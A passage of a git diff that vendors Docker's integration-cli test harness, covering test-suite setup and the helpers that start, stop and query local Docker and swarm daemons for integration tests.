+func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C, tokenURL string) {
+	if s == nil {
+		c.Fatal("registry suite isn't initialized")
+	}
+	s.reg = setupRegistry(c, false, "token", tokenURL)
+}
+
+func init() {
+	check.Suite(&DockerDaemonSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerDaemonSuite struct {
+	ds *DockerSuite
+	d  *Daemon
+}
+
+func (s *DockerDaemonSuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerDaemonSuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerDaemonSuite) TearDownTest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	if s.d != nil {
+		s.d.Stop()
+	}
+	s.ds.TearDownTest(c)
+}
+
+func (s *DockerDaemonSuite) TearDownSuite(c *check.C) {
+	filepath.Walk(daemonSockRoot, func(path string, fi os.FileInfo, err error) error {
+		if err != nil {
+			// ignore errors here
+			// not cleaning up sockets is not really an error
+			return nil
+		}
+		if fi.Mode() == os.ModeSocket {
+			syscall.Unlink(path)
+		}
+		return nil
+	})
+	os.RemoveAll(daemonSockRoot)
+}
+
+const defaultSwarmPort = 2477
+
+func init() {
+	check.Suite(&DockerSwarmSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerSwarmSuite struct {
+	server      *httptest.Server
+	ds          *DockerSuite
+	daemons     []*SwarmDaemon
+	daemonsLock sync.Mutex // protect access to daemons
+	portIndex   int
+}
+
+func (s *DockerSwarmSuite) OnTimeout(c *check.C) {
+	s.daemonsLock.Lock()
+	defer s.daemonsLock.Unlock()
+	for _, d := range s.daemons {
+		d.DumpStackAndQuit()
+	}
+}
+
+func (s *DockerSwarmSuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+}
+
+func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *SwarmDaemon {
+	d := &SwarmDaemon{
+		Daemon: NewDaemon(c),
+		port:   defaultSwarmPort + s.portIndex,
+	}
+	d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port)
+	args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts
+	if experimentalDaemon {
+		args = append(args, "--experimental")
+	}
+	err := d.StartWithBusybox(args...)
+	c.Assert(err, check.IsNil)
+
+	if joinSwarm == true {
+		if len(s.daemons) > 0 {
+			tokens := s.daemons[0].joinTokens(c)
+			token := tokens.Worker
+			if manager {
+				token = tokens.Manager
+			}
+			c.Assert(d.Join(swarm.JoinRequest{
+				RemoteAddrs: []string{s.daemons[0].listenAddr},
+				JoinToken:   token,
+			}), check.IsNil)
+		} else {
+			c.Assert(d.Init(swarm.InitRequest{}), check.IsNil)
+		}
+	}
+
+	s.portIndex++
+	s.daemonsLock.Lock()
+	s.daemons = append(s.daemons, d)
+	s.daemonsLock.Unlock()
+
+	return d
+}
+
+func (s *DockerSwarmSuite) TearDownTest(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	s.daemonsLock.Lock()
+	for _, d := range s.daemons {
+		d.Stop()
+		// raft state file is quite big (64MB) so remove it after every test
+		walDir := filepath.Join(d.root, "swarm/raft/wal")
+		if err := os.RemoveAll(walDir); err != nil {
+			c.Logf("error removing %v: %v", walDir, err)
+		}
+
+		cleanupExecRoot(c, d.execRoot)
+	}
+	s.daemons = nil
+	s.daemonsLock.Unlock()
+
+	s.portIndex = 0
+	s.ds.TearDownTest(c)
+}
+
+func init() {
+	check.Suite(&DockerTrustSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerTrustSuite struct {
+	ds  *DockerSuite
+	reg *testRegistryV2
+	not *testNotary
+}
+
+func (s *DockerTrustSuite) SetUpTest(c *check.C) {
+	testRequires(c, RegistryHosting, NotaryServerHosting)
+	s.reg = setupRegistry(c, false, "", "")
+	s.not = setupNotary(c)
+}
+
+func (s *DockerTrustSuite) TearDownTest(c *check.C) {
+	if s.reg != nil {
+		s.reg.Close()
+	}
+	if s.not != nil {
+		s.not.Close()
+	}
+
+	// Remove trusted keys and metadata after test
+	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
+	s.ds.TearDownTest(c)
+}
+
+func init() {
+	ds := &DockerSuite{}
+	check.Suite(&DockerTrustedSwarmSuite{
+		trustSuite: DockerTrustSuite{
+			ds: ds,
+		},
+		swarmSuite: DockerSwarmSuite{
+			ds: ds,
+		},
+	})
+}
+
+type DockerTrustedSwarmSuite struct {
+	swarmSuite DockerSwarmSuite
+	trustSuite DockerTrustSuite
+	reg        *testRegistryV2
+	not        *testNotary
+}
+
+func (s *DockerTrustedSwarmSuite) SetUpTest(c *check.C) {
+	s.swarmSuite.SetUpTest(c)
+	s.trustSuite.SetUpTest(c)
+}
+
+func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) {
+	s.trustSuite.TearDownTest(c)
+	s.swarmSuite.TearDownTest(c)
+}
+
+func (s *DockerTrustedSwarmSuite) OnTimeout(c *check.C) {
+	s.swarmSuite.OnTimeout(c)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go
new file mode 100644
index 0000000000..9fd3f1e82d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon.go
@@ -0,0 +1,608 @@
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/go-check/check"
+)
+
+var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration")
+
+// Daemon represents a Docker daemon for the testing framework.
+type Daemon struct {
+	GlobalFlags []string
+
+	id                string
+	c                 *check.C
+	logFile           *os.File
+	folder            string
+	root              string
+	stdin             io.WriteCloser
+	stdout, stderr    io.ReadCloser
+	cmd               *exec.Cmd
+	storageDriver     string
+	wait              chan error
+	userlandProxy     bool
+	useDefaultHost    bool
+	useDefaultTLSHost bool
+	execRoot          string
+}
+
+type clientConfig struct {
+	transport *http.Transport
+	scheme    string
+	addr      string
+}
+
+// NewDaemon returns a Daemon instance to be used for testing.
+// This will create a directory such as d123456789 in the folder specified by $DEST.
+// The daemon will not automatically start.
+func NewDaemon(c *check.C) *Daemon {
+	dest := os.Getenv("DEST")
+	c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable"))
+
+	err := os.MkdirAll(daemonSockRoot, 0700)
+	c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root"))
+
+	id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID()))
+	dir := filepath.Join(dest, id)
+	daemonFolder, err := filepath.Abs(dir)
+	c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir))
+	daemonRoot := filepath.Join(daemonFolder, "root")
+
+	c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir))
+
+	userlandProxy := true
+	if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" {
+		if val, err := strconv.ParseBool(env); err != nil {
+			userlandProxy = val
+		}
+	}
+
+	return &Daemon{
+		id:            id,
+		c:             c,
+		folder:        daemonFolder,
+		root:          daemonRoot,
+		storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"),
+		userlandProxy: userlandProxy,
+		execRoot:      filepath.Join(os.TempDir(), "docker-execroot", id),
+	}
+}
+
+// RootDir returns the root directory of the daemon.
+func (d *Daemon) RootDir() string {
+	return d.root
+}
+
+func (d *Daemon) getClientConfig() (*clientConfig, error) {
+	var (
+		transport *http.Transport
+		scheme    string
+		addr      string
+		proto     string
+	)
+	if d.useDefaultTLSHost {
+		option := &tlsconfig.Options{
+			CAFile:   "fixtures/https/ca.pem",
+			CertFile: "fixtures/https/client-cert.pem",
+			KeyFile:  "fixtures/https/client-key.pem",
+		}
+		tlsConfig, err := tlsconfig.Client(*option)
+		if err != nil {
+			return nil, err
+		}
+		transport = &http.Transport{
+			TLSClientConfig: tlsConfig,
+		}
+		addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort)
+		scheme = "https"
+		proto = "tcp"
+	} else if d.useDefaultHost {
+		addr = opts.DefaultUnixSocket
+		proto = "unix"
+		scheme = "http"
+		transport = &http.Transport{}
+	} else {
+		addr = d.sockPath()
+		proto = "unix"
+		scheme = "http"
+		transport = &http.Transport{}
+	}
+
+	d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil)
+
+	return &clientConfig{
+		transport: transport,
+		scheme:    scheme,
+		addr:      addr,
+	}, nil
+}
+
+// Start will start the daemon and return once it is ready to receive requests.
+// You can specify additional daemon flags.
+func (d *Daemon) Start(args ...string) error {
+	logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600)
+	d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder))
+
+	return d.StartWithLogFile(logFile, args...)
+}
+
+// StartWithLogFile will start the daemon and attach its streams to a given file.
+func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error {
+	dockerdBinary, err := exec.LookPath(dockerdBinary)
+	d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id))
+
+	args := append(d.GlobalFlags,
+		"--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock",
+		"--graph", d.root,
+		"--exec-root", d.execRoot,
+		"--pidfile", fmt.Sprintf("%s/docker.pid", d.folder),
+		fmt.Sprintf("--userland-proxy=%t", d.userlandProxy),
+	)
+	if experimentalDaemon {
+		args = append(args, "--experimental", "--init")
+	}
+	if !(d.useDefaultHost || d.useDefaultTLSHost) {
+		args = append(args, []string{"--host", d.sock()}...)
+	}
+	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+		args = append(args, []string{"--userns-remap", root}...)
+	}
+
+	// If we don't explicitly set the log-level or debug flag(-D) then
+	// turn on debug mode
+	foundLog := false
+	foundSd := false
+	for _, a := range providedArgs {
+		if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") {
+			foundLog = true
+		}
+		if strings.Contains(a, "--storage-driver") {
+			foundSd = true
+		}
+	}
+	if !foundLog {
+		args = append(args, "--debug")
+	}
+	if d.storageDriver != "" && !foundSd {
+		args = append(args, "--storage-driver", d.storageDriver)
+	}
+
+	args = append(args, providedArgs...)
+	d.cmd = exec.Command(dockerdBinary, args...)
+	d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1")
+	d.cmd.Stdout = out
+	d.cmd.Stderr = out
+	d.logFile = out
+
+	if err := d.cmd.Start(); err != nil {
+		return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err)
+	}
+
+	wait := make(chan error)
+
+	go func() {
+		wait <- d.cmd.Wait()
+		d.c.Logf("[%s] exiting daemon", d.id)
+		close(wait)
+	}()
+
+	d.wait = wait
+
+	tick := time.Tick(500 * time.Millisecond)
+	// make sure daemon is ready to receive requests
+	startTime := time.Now().Unix()
+	for {
+		d.c.Logf("[%s] waiting for daemon to start", d.id)
+		if time.Now().Unix()-startTime > 5 {
+			// After 5 seconds, give up
+			return fmt.Errorf("[%s] Daemon exited and never started", d.id)
+		}
+		select {
+		case <-time.After(2 * time.Second):
+			return fmt.Errorf("[%s] timeout: daemon does not respond", d.id)
+		case <-tick:
+			clientConfig, err := d.getClientConfig()
+			if err != nil {
+				return err
+			}
+
+			client := &http.Client{
+				Transport: clientConfig.transport,
+			}
+
+			req, err := http.NewRequest("GET", "/_ping", nil)
+			d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id))
+			req.URL.Host = clientConfig.addr
+			req.URL.Scheme = clientConfig.scheme
+			resp, err := client.Do(req)
+			if err != nil {
+				continue
+			}
+			if resp.StatusCode != http.StatusOK {
+				d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status)
+			}
+			d.c.Logf("[%s] daemon started", d.id)
+			d.root, err = d.queryRootDir()
+			if err != nil {
+				return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err)
+			}
+			return nil
+		case <-d.wait:
+			return fmt.Errorf("[%s] Daemon exited during startup", d.id)
+		}
+	}
+}
+
+// StartWithBusybox will first start the daemon with Daemon.Start()
+// then save the busybox image from the main daemon and load it into this Daemon instance.
+func (d *Daemon) StartWithBusybox(arg ...string) error {
+	if err := d.Start(arg...); err != nil {
+		return err
+	}
+	return d.LoadBusybox()
+}
+
+// Kill will send a SIGKILL to the daemon
+func (d *Daemon) Kill() error {
+	if d.cmd == nil || d.wait == nil {
+		return errors.New("daemon not started")
+	}
+
+	defer func() {
+		d.logFile.Close()
+		d.cmd = nil
+	}()
+
+	if err := d.cmd.Process.Kill(); err != nil {
+		d.c.Logf("Could not kill daemon: %v", err)
+		return err
+	}
+
+	if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its
+// stack to its log file and exit
+// This is used primarily for gathering debug information on test timeout
+func (d *Daemon) DumpStackAndQuit() {
+	if d.cmd == nil || d.cmd.Process == nil {
+		return
+	}
+	signalDaemonDump(d.cmd.Process.Pid)
+}
+
+// Stop will send a SIGINT every second and wait for the daemon to stop.
+// If it timeouts, a SIGKILL is sent.
+// Stop will not delete the daemon directory. If a purged daemon is needed,
+// instantiate a new one with NewDaemon.
+func (d *Daemon) Stop() error {
+	if d.cmd == nil || d.wait == nil {
+		return errors.New("daemon not started")
+	}
+
+	defer func() {
+		d.logFile.Close()
+		d.cmd = nil
+	}()
+
+	i := 1
+	tick := time.Tick(time.Second)
+
+	if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
+		return fmt.Errorf("could not send signal: %v", err)
+	}
+out1:
+	for {
+		select {
+		case err := <-d.wait:
+			return err
+		case <-time.After(20 * time.Second):
+			// time for stopping jobs and run onShutdown hooks
+			d.c.Logf("timeout: %v", d.id)
+			break out1
+		}
+	}
+
+out2:
+	for {
+		select {
+		case err := <-d.wait:
+			return err
+		case <-tick:
+			i++
+			if i > 5 {
+				d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i)
+				break out2
+			}
+			d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid)
+			if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
+				return fmt.Errorf("could not send signal: %v", err)
+			}
+		}
+	}
+
+	if err := d.cmd.Process.Kill(); err != nil {
+		d.c.Logf("Could not kill daemon: %v", err)
+		return err
+	}
+
+	if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// Restart will restart the daemon by first stopping it and then starting it.
+func (d *Daemon) Restart(arg ...string) error {
+	d.Stop()
+	// in the case of tests running a user namespace-enabled daemon, we have resolved
+	// d.root to be the actual final path of the graph dir after the "uid.gid" of
+	// remapped root is added--we need to subtract it from the path before calling
+	// start or else we will continue making subdirectories rather than truly restarting
+	// with the same location/root:
+	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
+		d.root = filepath.Dir(d.root)
+	}
+	return d.Start(arg...)
+}
+
+// LoadBusybox will load the stored busybox into a newly started daemon
+func (d *Daemon) LoadBusybox() error {
+	bb := filepath.Join(d.folder, "busybox.tar")
+	if _, err := os.Stat(bb); err != nil {
+		if !os.IsNotExist(err) {
+			return fmt.Errorf("unexpected error on busybox.tar stat: %v", err)
+		}
+		// saving busybox image from main daemon
+		if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil {
+			imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput()
+			return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut)))
+		}
+	}
+	// loading busybox image to this daemon
+	if out, err := d.Cmd("load", "--input", bb); err != nil {
+		return fmt.Errorf("could not load busybox image: %s", out)
+	}
+	if err := os.Remove(bb); err != nil {
+		d.c.Logf("could not remove %s: %v", bb, err)
+	}
+	return nil
+}
+
+func (d *Daemon) queryRootDir() (string, error) {
+	// update daemon root by asking /info endpoint (to support user
+	// namespaced daemon with root remapped uid.gid directory)
+	clientConfig, err := d.getClientConfig()
+	if err != nil {
+		return "", err
+	}
+
+	client := &http.Client{
+		Transport: clientConfig.transport,
+	}
+
+	req, err := http.NewRequest("GET", "/info", nil)
+	if err != nil {
+		return "", err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.URL.Host = clientConfig.addr
+	req.URL.Scheme = clientConfig.scheme
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return "", err
+	}
+	body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
+		return resp.Body.Close()
+	})
+
+	type Info struct {
+		DockerRootDir string
+	}
+	var b []byte
+	var i Info
+	b, err = readBody(body)
+	if err == nil && resp.StatusCode == http.StatusOK {
+		// read the docker root dir
+		if err = json.Unmarshal(b, &i); err == nil {
+			return i.DockerRootDir, nil
+		}
+	}
+	return "", err
+}
+
+func (d *Daemon) sock() string {
+	return fmt.Sprintf("unix://" + d.sockPath())
+}
+
+func (d *Daemon) sockPath() string {
+	return filepath.Join(daemonSockRoot, d.id+".sock")
+}
+
+func (d *Daemon) waitRun(contID string) error {
+	args := []string{"--host", d.sock()}
+	return waitInspectWithArgs(contID, "{{.State.Running}}", "true", 10*time.Second, args...)
+}
+
+func (d *Daemon) getBaseDeviceSize(c *check.C) int64 {
+	infoCmdOutput, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "-H", d.sock(), "info"),
+		exec.Command("grep", "Base Device Size"),
+	)
+	c.Assert(err, checker.IsNil)
+	basesizeSlice := strings.Split(infoCmdOutput, ":")
+	basesize := strings.Trim(basesizeSlice[1], " ")
+	basesize = strings.Trim(basesize, "\n")[:len(basesize)-3]
+	basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64)
+	c.Assert(err, checker.IsNil)
+	basesizeBytes := int64(basesizeFloat) * (1024 * 1024 * 1024)
+	return basesizeBytes
+}
+
+// Cmd will execute a docker CLI command against this Daemon.
+// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version
+func (d *Daemon) Cmd(args ...string) (string, error) {
+	b, err := d.command(args...).CombinedOutput()
+	return string(b), err
+}
+
+func (d *Daemon) command(args ...string) *exec.Cmd {
+	return exec.Command(dockerBinary, d.prependHostArg(args)...)
+}
+
+func (d *Daemon) prependHostArg(args []string) []string {
+	for _, arg := range args {
+		if arg == "--host" || arg == "-H" {
+			return args
+		}
+	}
+	return append([]string{"--host", d.sock()}, args...)
+}
+
+// SockRequest executes a socket request on a daemon and returns statuscode and output.
+func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) {
+	jsonData := bytes.NewBuffer(nil)
+	if err := json.NewEncoder(jsonData).Encode(data); err != nil {
+		return -1, nil, err
+	}
+
+	res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json")
+	if err != nil {
+		return -1, nil, err
+	}
+	b, err := readBody(body)
+	return res.StatusCode, b, err
+}
+
+// SockRequestRaw executes a socket request on a daemon and returns an http
+// response and a reader for the output data.
+func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) {
+	return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock())
+}
+
+// LogFileName returns the path the the daemon's log file
+func (d *Daemon) LogFileName() string {
+	return d.logFile.Name()
+}
+
+func (d *Daemon) getIDByName(name string) (string, error) {
+	return d.inspectFieldWithError(name, "Id")
+}
+
+func (d *Daemon) activeContainers() (ids []string) {
+	out, _ := d.Cmd("ps", "-q")
+	for _, id := range strings.Split(out, "\n") {
+		if id = strings.TrimSpace(id); id != "" {
+			ids = append(ids, id)
+		}
+	}
+	return
+}
+
+func (d *Daemon) inspectFilter(name, filter string) (string, error) {
+	format := fmt.Sprintf("{{%s}}", filter)
+	out, err := d.Cmd("inspect", "-f", format, name)
+	if err != nil {
+		return "", fmt.Errorf("failed to inspect %s: %s", name, out)
+	}
+	return strings.TrimSpace(out), nil
+}
+
+func (d *Daemon) inspectFieldWithError(name, field string) (string, error) {
+	return d.inspectFilter(name, fmt.Sprintf(".%s", field))
+}
+
+func (d *Daemon) findContainerIP(id string) string {
+	out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id)
+	if err != nil {
+		d.c.Log(err)
+	}
+	return strings.Trim(out, " \r\n'")
+}
+
+func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, error) {
+	buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...)
+	return runCommandWithOutput(buildCmd)
+}
+
+func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) {
+	out, err := d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	if len(strings.TrimSpace(out)) == 0 {
+		return 0, nil
+	}
+	return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out))
+}
+
+func (d *Daemon) reloadConfig() error {
+	if d.cmd == nil || d.cmd.Process == nil {
+		return fmt.Errorf("daemon is not running")
+	}
+
+	errCh := make(chan error)
+	started := make(chan struct{})
+	go func() {
+		_, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock())
+		close(started)
+		if err != nil {
+			errCh <- err
+		}
+		defer body.Close()
+		dec := json.NewDecoder(body)
+		for {
+			var e events.Message
+			if err := dec.Decode(&e); err != nil {
+				errCh <- err
+				return
+			}
+			if e.Type != events.DaemonEventType {
+				continue
+			}
+			if e.Action != "reload" {
+				continue
+			}
+			close(errCh) // notify that we are done
+			return
+		}
+	}()
+
+	<-started
+	if err := signalDaemonReload(d.cmd.Process.Pid); err != nil {
+		return fmt.Errorf("error signaling daemon reload: %v", err)
+	}
+	select {
+	case err := <-errCh:
+		if err != nil {
+			return fmt.Errorf("error waiting for daemon reload event: %v", err)
+		}
+	case <-time.After(30 * time.Second):
+		return fmt.Errorf("timeout waiting for daemon reload event")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
new file mode 100644
index 0000000000..199bce0e7b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
@@ -0,0 +1,419 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// SwarmDaemon is a test daemon with helpers for participating in a swarm.
+type SwarmDaemon struct {
+	*Daemon
+	swarm.Info
+	port       int
+	listenAddr string
+}
+
+// Init initializes a new swarm cluster.
+func (d *SwarmDaemon) Init(req swarm.InitRequest) error {
+	if req.ListenAddr == "" {
+		req.ListenAddr = d.listenAddr
+	}
+	status, out, err := d.SockRequest("POST", "/swarm/init", req)
+	if status != http.StatusOK {
+		return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out)
+	}
+	if err != nil {
+		return fmt.Errorf("initializing swarm: %v", err)
+	}
+	info, err := d.info()
+	if err != nil {
+		return err
+	}
+	d.Info = info
+	return nil
+}
+
+// Join joins a daemon to an existing cluster.
+func (d *SwarmDaemon) Join(req swarm.JoinRequest) error {
+	if req.ListenAddr == "" {
+		req.ListenAddr = d.listenAddr
+	}
+	status, out, err := d.SockRequest("POST", "/swarm/join", req)
+	if status != http.StatusOK {
+		return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out)
+	}
+	if err != nil {
+		return fmt.Errorf("joining swarm: %v", err)
+	}
+	info, err := d.info()
+	if err != nil {
+		return err
+	}
+	d.Info = info
+	return nil
+}
+
+// Leave forces daemon to leave current cluster.
+func (d *SwarmDaemon) Leave(force bool) error {
+	url := "/swarm/leave"
+	if force {
+		url += "?force=1"
+	}
+	status, out, err := d.SockRequest("POST", url, nil)
+	if status != http.StatusOK {
+		return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out)
+	}
+	if err != nil {
+		err = fmt.Errorf("leaving swarm: %v", err)
+	}
+	return err
+}
+
+func (d *SwarmDaemon) info() (swarm.Info, error) {
+	var info struct {
+		Swarm swarm.Info
+	}
+	status, dt, err := d.SockRequest("GET", "/info", nil)
+	if status != http.StatusOK {
+		return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status)
+	}
+	if err != nil {
+		return info.Swarm, fmt.Errorf("get swarm info: %v", err)
+	}
+	if err := json.Unmarshal(dt, &info); err != nil {
+		return info.Swarm, err
+	}
+	return info.Swarm, nil
+}
+
+type serviceConstructor func(*swarm.Service)
+type nodeConstructor func(*swarm.Node)
+type specConstructor func(*swarm.Spec)
+
+func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string {
+	var service swarm.Service
+	for _, fn := range f {
+		fn(&service)
+	}
+	status, out, err := d.SockRequest("POST", "/services/create", service.Spec)
+
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out)))
+
+	var scr types.ServiceCreateResponse
+	c.Assert(json.Unmarshal(out, &scr), checker.IsNil)
+	return scr.ID
+}
+
+func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service {
+	var service swarm.Service
+	status, out, err := d.SockRequest("GET", "/services/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &service), checker.IsNil)
+	return &service
+}
+
+func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task {
+	var tasks []swarm.Task
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+	filterArgs.Add("service", service)
+	filters, err := filters.ToParam(filterArgs)
+	c.Assert(err, checker.IsNil)
+
+	status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &tasks), checker.IsNil)
+	return tasks
+}
+
+func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks := d.getServiceTasks(c, service)
+		var count int
+		for _, task := range tasks {
+			if task.Status.State == state {
+				if message == "" || strings.Contains(task.Status.Message, message) {
+					count++
+				}
+			}
+		}
+		return count, nil
+	}
+}
+
+func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "")
+}
+
+func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		service := d.getService(c, service)
+		return service.UpdateStatus.State, nil
+	}
+}
+
+func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks := d.getServiceTasks(c, service)
+		return len(tasks), nil
+	}
+}
+
+func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) {
+	var tasks []swarm.Task
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+	filters, err := filters.ToParam(filterArgs)
+	c.Assert(err, checker.IsNil)
+
+	status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &tasks), checker.IsNil)
+
+	result := make(map[string]int)
+	for _, task := range tasks {
+		if task.Status.State == swarm.TaskStateRunning {
+			result[task.Spec.ContainerSpec.Image]++
+		}
+	}
+	return result, nil
+}
+
+func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) {
+	nodes := d.listNodes(c)
+	var readyCount int
+	for _, node := range nodes {
+		if node.Status.State == swarm.NodeStateReady {
+			readyCount++
+		}
+	}
+	return readyCount, nil
+}
+
+func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task {
+	var task swarm.Task
+
+	status, out, err := d.SockRequest("GET", "/tasks/"+id, nil)
+	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
+	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
+	c.Assert(json.Unmarshal(out, &task), checker.IsNil)
+	return task
+}
+
+func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) {
+	for _, fn := range f {
+		fn(service)
+	}
